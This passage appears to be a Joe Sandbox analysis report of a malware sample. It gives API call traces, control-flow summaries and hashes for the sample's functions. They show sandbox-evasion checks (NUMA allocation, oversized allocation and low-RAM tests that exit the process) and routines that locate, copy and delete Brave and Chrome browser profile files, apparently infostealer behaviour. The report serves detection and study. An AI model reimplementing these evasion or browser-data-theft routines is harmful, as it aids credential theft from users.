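On the sample above the decoder reports VirtualAllocExNuma with dwSize 2000, MEM_COMMIT|MEM_RESERVE and PAGE_EXECUTE_READWRITE on node 0, VirtualAlloc with dwSize 399000000 and PAGE_READWRITE, VirtualFree with MEM_RELEASE, and two findings (00B0104D gating ExitProcess, 00B0106C oversized). Because GlobalMemoryStatusEx is already in PROBE_APIS, the same sequence check covers the memory-status function further down in this report once its call lines are fed in.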
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Similarity
                            • API ID: Virtual$AllocProcess$CurrentExitFreeNuma
                            • String ID:
                            • API String ID: 3477276466-0
                            • Opcode ID: f9682dd2527648314e9dbea5c5b0748ae654715fca133836b58ceac4787f0930
                            • Instruction ID: d2feed88acc8bc58e364fd8aabc7a5d2468273b39c43dab4f6ddd4efaaadeb41
                            • Opcode Fuzzy Hash: f9682dd2527648314e9dbea5c5b0748ae654715fca133836b58ceac4787f0930
                            • Instruction Fuzzy Hash: 7201F4717403047BE7284B696C6AF6BBBEDE784B11F208414F744E73C0E9B1EA008674

                            Control-flow Graph (text summary of the graph data; the original page renders it as an image)
                            • b1ee90-b1eeb5 call b02930 → b1eeb7 (lstrcpy at b1eec1 on one edge) → b1eec9 call b06c40 → b1eed2-b1eee8 StrCmpCA against "ERROR". On one outcome: b1ef11 call b02a20 → loop b1ef20 → b1ef2a call b02930 → b1ef3e lstrcpy of the literal "ERROR" (or b1ef39) → b1ef45. On the other: b1eeea call b02a20, call b02930 → b1ef04 → b1ef45-b1efa0, ten consecutive calls to b02a20.
                            • "ERROR" is the same literal the function listed further up compares against with StrCmpCA at 00B1F61C, 00B1F718 and 00B1FA32, so it acts as a shared error sentinel that these routines check their string results against rather than as data specific to this function.
                            APIs
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B1EEC3
                            • StrCmpCA.SHLWAPI(?,ERROR), ref: 00B1EEDE
                            • lstrcpy.KERNEL32(00000000,ERROR), ref: 00B1EF3F
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Similarity
                            • API ID: lstrcpy
                            • String ID: ERROR
                            • API String ID: 3722407311-2861137601
                            • Opcode ID: 27be6e014d36781ebf6de8d97c19c12963b02c5b5d9a35ffd76fee4b15ca918d
                            • Instruction ID: 89e163d527f4949940f4511b9030a58e1b7f50f574c2c138c385ca11519d532b
                            • Opcode Fuzzy Hash: 27be6e014d36781ebf6de8d97c19c12963b02c5b5d9a35ffd76fee4b15ca918d
                            • Instruction Fuzzy Hash: 382101317202069BDB21FF78DC4AA9A7BE4AF10300F4454B4BC5ADB292DE30E8598790

                            Control-flow Graph (text summary of the graph data; the original page renders it as an image)
                            • b010c0-b010cb → loop b010d0-b010dc → b010de-b010f3 GlobalMemoryStatusEx. One edge goes straight to ExitProcess at b01112-b01114; the other runs comparisons on the returned structure in b010f5-b01106 → b01108 → b0110a-b01110, each of which can also reach ExitProcess; the only non-terminating exit is b0111a-b0111d.
                            • GlobalMemoryStatusEx is the only API in this function and "@" (0x40 = 64) the only string the report extracts for it; 64 is sizeof(MEMORYSTATUSEX), so the "string" is most likely the dwLength value the structure must carry before the call. Deciding from the reported memory figures whether to keep running is a common check for low-RAM analysis VMs; the threshold compared against is not recoverable from the report.
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Similarity
                            • API ID: ExitGlobalMemoryProcessStatus
                            • String ID: @
                            • API String ID: 803317263-2766056989
                            • Opcode ID: 87a94ee9756eed2b62c83d5ed4ad36c250170a929cb641aefb3ab8ed971af04a
                            • Instruction ID: c9adcb9ac6ff4bb20b230dba4fac74447c17b0afc475bf1dd044eea5f392f551
                            • Opcode Fuzzy Hash: 87a94ee9756eed2b62c83d5ed4ad36c250170a929cb641aefb3ab8ed971af04a
                            • Instruction Fuzzy Hash: F2F082701182455BEB1C6A6C985A729FFD8EB01350F104DA9EEDAD22E1F670C8409167

                            Control-flow Graph (text summary of the graph data; the original page renders it as an image)
                            • Entry block b18c88-b18cc4 is an alternative entry, 0x18 bytes earlier, into the same body as the function at b18ca0 above: StrCmpCA at the entry, one edge to ExitProcess at b18cc6, the other into the b18cf3/b18cf6 loop whose dispatcher at b18cff reaches the same nine StrCmpCA blocks (b18d84 through b18e6f) and four lstrlen blocks (b18d06, b18d30, b18d5a, b18e88), rejoining at b18ec3 and leaving through b18ee2 (call b02a20).
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            • Associated: 00000001.00000002.1383156941.0000000000B00000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383181053.0000000000B37000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383181053.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383181053.0000000000B96000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383181053.0000000000BAF000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383181053.0000000000D38000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383353480.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383368698.0000000000FAE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383368698.0000000000FD7000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383368698.0000000000FE0000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383368698.0000000000FEE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383599390.0000000000FEF000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383712492.000000000118A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383731322.000000000118B000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExitProcess
                            • String ID: block
                            • API String ID: 621844428-2199623458
                            • Opcode ID: 3e2168c608d702cd45b9def3b925c635478d34c6585dd777220d5d14a3b0e626
                            • Instruction ID: 20453127e6582eaa66e8be78f51cb2230d66e73eaee5acf0e2108d00c98352b3
                            • Opcode Fuzzy Hash: 3e2168c608d702cd45b9def3b925c635478d34c6585dd777220d5d14a3b0e626
                            • Instruction Fuzzy Hash: 1CE0D861500364EBCB04ABA49C98986BB68FF00318B1040ACE900AB251D770AC05CF69
                            APIs
                            • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00B01046
                            • VirtualAllocExNuma.KERNEL32(00000000), ref: 00B0104D
                            • ExitProcess.KERNEL32 ref: 00B01058
                            • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 00B0106C
                            • VirtualFree.KERNEL32(00000000,17C841C0,00008000), ref: 00B010AB
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            • Associated: 00000001.00000002.1383156941.0000000000B00000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383181053.0000000000B37000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383181053.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383181053.0000000000B96000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383181053.0000000000BAF000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383181053.0000000000D38000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383353480.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383368698.0000000000FAE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383368698.0000000000FD7000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383368698.0000000000FE0000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383368698.0000000000FEE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383599390.0000000000FEF000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383712492.000000000118A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383731322.000000000118B000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Virtual$AllocProcess$CurrentExitFreeNuma
                            • String ID:
                            • API String ID: 3477276466-0
                            • Opcode ID: 130030239f1aa8b517d6ebaf344cf9ccae225ec8663210e0cbe776ab3c0790b7
                            • Instruction ID: 3899fa6cae99427ac5ddfba5a8d1fecb14443b416080a1082903276bc5bc1240
                            • Opcode Fuzzy Hash: 130030239f1aa8b517d6ebaf344cf9ccae225ec8663210e0cbe776ab3c0790b7
                            • Instruction Fuzzy Hash: 38E0C7B46883813EF7240B61AC5FF02BF2CAB12B09F000040F300FA2C2E9E1AA008678
                            APIs
                            • lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B123D4
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B123F7
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00B12402
                            • lstrlen.KERNEL32(\*.*), ref: 00B1240D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B1242A
                            • lstrcat.KERNEL32(00000000,\*.*), ref: 00B12436
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B1246A
                            • FindFirstFileA.KERNEL32(00000000,?), ref: 00B12486
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            • Associated: 00000001.00000002.1383156941.0000000000B00000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383181053.0000000000B37000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383181053.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383181053.0000000000B96000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383181053.0000000000BAF000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383181053.0000000000D38000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383353480.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383368698.0000000000FAE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383368698.0000000000FD7000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383368698.0000000000FE0000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383368698.0000000000FEE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383599390.0000000000FEF000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383712492.000000000118A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383731322.000000000118B000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                            • String ID: \*.*
                            • API String ID: 2567437900-1173974218
                            • Opcode ID: 6e48e282afcb72fe9d7acea87c3cf8001018b1bee9fb77e9dd106b05aa41c550
                            • Instruction ID: 4a7402bddb8f831c82342bec7ec578dfa8eafd05282a29fc6b6f2df2b00429b7
                            • Opcode Fuzzy Hash: 6e48e282afcb72fe9d7acea87c3cf8001018b1bee9fb77e9dd106b05aa41c550
                            • Instruction Fuzzy Hash: 6CA28171A117169BCB21AF78DC89AAEBBF9EF44700F4440A4F805E7391DB74DD498BA0
                            APIs
                            • lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B016E2
                            • lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B01719
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B0176C
                            • lstrcat.KERNEL32(00000000), ref: 00B01776
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B017A2
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B017EF
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00B017F9
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B01825
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B01875
                            • lstrcat.KERNEL32(00000000), ref: 00B0187F
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B018AB
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B018F3
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00B018FE
                            • lstrlen.KERNEL32(00B31794), ref: 00B01909
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B01929
                            • lstrcat.KERNEL32(00000000,00B31794), ref: 00B01935
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B0195B
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00B01966
                            • lstrlen.KERNEL32(\*.*), ref: 00B01971
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B0198E
                            • lstrcat.KERNEL32(00000000,\*.*), ref: 00B0199A
                              • Part of subcall function 00B24040: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,00000000), ref: 00B2406D
                              • Part of subcall function 00B24040: lstrcpy.KERNEL32(00000000,?), ref: 00B240A2
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B019C3
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B01A0E
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00B01A16
                            • lstrlen.KERNEL32(00B31794), ref: 00B01A21
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B01A41
                            • lstrcat.KERNEL32(00000000,00B31794), ref: 00B01A4D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B01A76
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00B01A81
                            • lstrlen.KERNEL32(00B31794), ref: 00B01A8C
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B01AAC
                            • lstrcat.KERNEL32(00000000,00B31794), ref: 00B01AB8
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B01ADE
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00B01AE9
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B01B11
                            • FindFirstFileA.KERNEL32(00000000,?), ref: 00B01B45
                            • StrCmpCA.SHLWAPI(?,00B317A0), ref: 00B01B70
                            • StrCmpCA.SHLWAPI(?,00B317A4), ref: 00B01B8A
                            • lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B01BC4
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B01BFB
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00B01C03
                            • lstrlen.KERNEL32(00B31794), ref: 00B01C0E
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B01C31
                            • lstrcat.KERNEL32(00000000,00B31794), ref: 00B01C3D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B01C69
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00B01C74
                            • lstrlen.KERNEL32(00B31794), ref: 00B01C7F
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B01CA2
                            • lstrcat.KERNEL32(00000000,00B31794), ref: 00B01CAE
                            • lstrlen.KERNEL32(?), ref: 00B01CBB
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B01CDB
                            • lstrcat.KERNEL32(00000000,?), ref: 00B01CE9
                            • lstrlen.KERNEL32(00B31794), ref: 00B01CF4
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B01D14
                            • lstrcat.KERNEL32(00000000,00B31794), ref: 00B01D20
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B01D46
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00B01D51
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B01D7D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B01DE0
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00B01DEB
                            • lstrlen.KERNEL32(00B31794), ref: 00B01DF6
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B01E19
                            • lstrcat.KERNEL32(00000000,00B31794), ref: 00B01E25
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B01E4B
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00B01E56
                            • lstrlen.KERNEL32(00B31794), ref: 00B01E61
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B01E81
                            • lstrcat.KERNEL32(00000000,00B31794), ref: 00B01E8D
                            • lstrlen.KERNEL32(?), ref: 00B01E9A
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B01EBA
                            • lstrcat.KERNEL32(00000000,?), ref: 00B01EC8
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B01EF4
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B01F3E
                            • GetFileAttributesA.KERNEL32(00000000), ref: 00B01F45
                            • lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B01F9F
                            • lstrlen.KERNEL32(01878C38), ref: 00B01FAE
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B01FDB
                            • lstrcat.KERNEL32(00000000,?), ref: 00B01FE3
                            • lstrlen.KERNEL32(00B31794), ref: 00B01FEE
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B0200E
                            • lstrcat.KERNEL32(00000000,00B31794), ref: 00B0201A
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B02042
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00B0204D
                            • lstrlen.KERNEL32(00B31794), ref: 00B02058
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B02075
                            • lstrcat.KERNEL32(00000000,00B31794), ref: 00B02081
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            • Associated: 00000001.00000002.1383156941.0000000000B00000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383181053.0000000000B37000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383181053.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383181053.0000000000B96000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383181053.0000000000BAF000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383181053.0000000000D38000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383353480.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383368698.0000000000FAE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383368698.0000000000FD7000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383368698.0000000000FE0000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383368698.0000000000FEE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383599390.0000000000FEF000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383712492.000000000118A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383731322.000000000118B000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$lstrlen$File$AttributesFindFirstFolderPath
                            • String ID: \*.*
                            • API String ID: 4127656590-1173974218
                            • Opcode ID: 22e66de1efe837b70c9a1ebb9784c7a8641deeb7b245be466a76b2d8ebc4cbbd
                            • Instruction ID: 549649f522391cac6abd55c8a85f755264a6b8afbd1c48e464fc7920b8011990
                            • Opcode Fuzzy Hash: 22e66de1efe837b70c9a1ebb9784c7a8641deeb7b245be466a76b2d8ebc4cbbd
                            • Instruction Fuzzy Hash: 2B926031A117169BCB25EF68DD88AAEBFF9EF44700F0445A4F805E7291DB74DD098BA0
                            APIs
                            • lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B0DBC1
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B0DBE4
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00B0DBEF
                            • lstrlen.KERNEL32(00B34CA8), ref: 00B0DBFA
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B0DC17
                            • lstrcat.KERNEL32(00000000,00B34CA8), ref: 00B0DC23
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B0DC4C
                            • lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B0DC8F
                            • lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B0DCBF
                            • FindFirstFileA.KERNEL32(00000000,?), ref: 00B0DCD0
                            • StrCmpCA.SHLWAPI(?,00B317A0), ref: 00B0DCF0
                            • StrCmpCA.SHLWAPI(?,00B317A4), ref: 00B0DD0A
                            • lstrlen.KERNEL32(00B2CFEC), ref: 00B0DD1D
                            • lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B0DD47
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B0DD70
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00B0DD7B
                            • lstrlen.KERNEL32(00B31794), ref: 00B0DD86
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B0DDA3
                            • lstrcat.KERNEL32(00000000,00B31794), ref: 00B0DDAF
                            • lstrlen.KERNEL32(?), ref: 00B0DDBC
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B0DDDF
                            • lstrcat.KERNEL32(00000000,?), ref: 00B0DDED
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B0DE19
                            • lstrlen.KERNEL32(00B31794), ref: 00B0DE3D
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B0DE6F
                            • lstrcat.KERNEL32(00000000,00B31794), ref: 00B0DE7B
                            • lstrlen.KERNEL32(018789B8), ref: 00B0DE8A
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B0DEB0
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00B0DEBB
                            • lstrlen.KERNEL32(00B31794), ref: 00B0DEC6
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B0DEE6
                            • lstrcat.KERNEL32(00000000,00B31794), ref: 00B0DEF2
                            • lstrlen.KERNEL32(01878AF8), ref: 00B0DF01
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B0DF27
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00B0DF32
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B0DF5E
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B0DFA5
                            • lstrcat.KERNEL32(00000000,00B31794), ref: 00B0DFB1
                            • lstrlen.KERNEL32(018789B8), ref: 00B0DFC0
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B0DFE9
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00B0DFF4
                            • lstrlen.KERNEL32(00B31794), ref: 00B0DFFF
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B0E022
                            • lstrcat.KERNEL32(00000000,00B31794), ref: 00B0E02E
                            • lstrlen.KERNEL32(01878AF8), ref: 00B0E03D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B0E063
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00B0E06E
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B0E09A
                            • StrCmpCA.SHLWAPI(?,Brave), ref: 00B0E0CD
                            • StrCmpCA.SHLWAPI(?,Preferences), ref: 00B0E0E7
                            • lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B0E11F
                            • lstrlen.KERNEL32(0187D280), ref: 00B0E12E
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B0E155
                            • lstrcat.KERNEL32(00000000,?), ref: 00B0E15D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B0E19F
                            • lstrcat.KERNEL32(00000000), ref: 00B0E1A9
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B0E1D0
                            • CopyFileA.KERNEL32(00000000,?,00000001), ref: 00B0E1F9
                            • lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B0E22F
                            • lstrlen.KERNEL32(01878C38), ref: 00B0E23D
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B0E261
                            • lstrcat.KERNEL32(00000000,01878C38), ref: 00B0E269
                            • lstrlen.KERNEL32(\Brave\Preferences), ref: 00B0E274
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B0E29B
                            • lstrcat.KERNEL32(00000000,\Brave\Preferences), ref: 00B0E2A7
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B0E2CF
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B0E30F
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B0E349
                            • DeleteFileA.KERNEL32(?), ref: 00B0E381
                            • StrCmpCA.SHLWAPI(?,0187D250), ref: 00B0E3AB
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B0E3F4
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B0E41C
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B0E445
                            • StrCmpCA.SHLWAPI(?,01878AF8), ref: 00B0E468
                            • StrCmpCA.SHLWAPI(?,018789B8), ref: 00B0E47D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B0E4D9
                            • GetFileAttributesA.KERNEL32(00000000), ref: 00B0E4E0
                            • StrCmpCA.SHLWAPI(?,0187D2C8), ref: 00B0E58E
                            • lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B0E5C4
                            • CopyFileA.KERNEL32(00000000,?,00000001), ref: 00B0E639
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B0E678
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B0E6A1
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B0E6C7
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B0E70E
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B0E737
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B0E75C
                            • StrCmpCA.SHLWAPI(?,Google Chrome), ref: 00B0E776
                            • DeleteFileA.KERNEL32(?), ref: 00B0E7D2
                            • StrCmpCA.SHLWAPI(?,01878C78), ref: 00B0E7FC
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B0E88C
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B0E8B5
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B0E8EE
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B0E916
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B0E952
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            • Associated: 00000001.00000002.1383156941.0000000000B00000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383181053.0000000000B37000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383181053.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383181053.0000000000B96000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383181053.0000000000BAF000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383181053.0000000000D38000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383353480.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1383368698.0000000000FAE000.00000040.00000001.01000000.00000003.sdmp
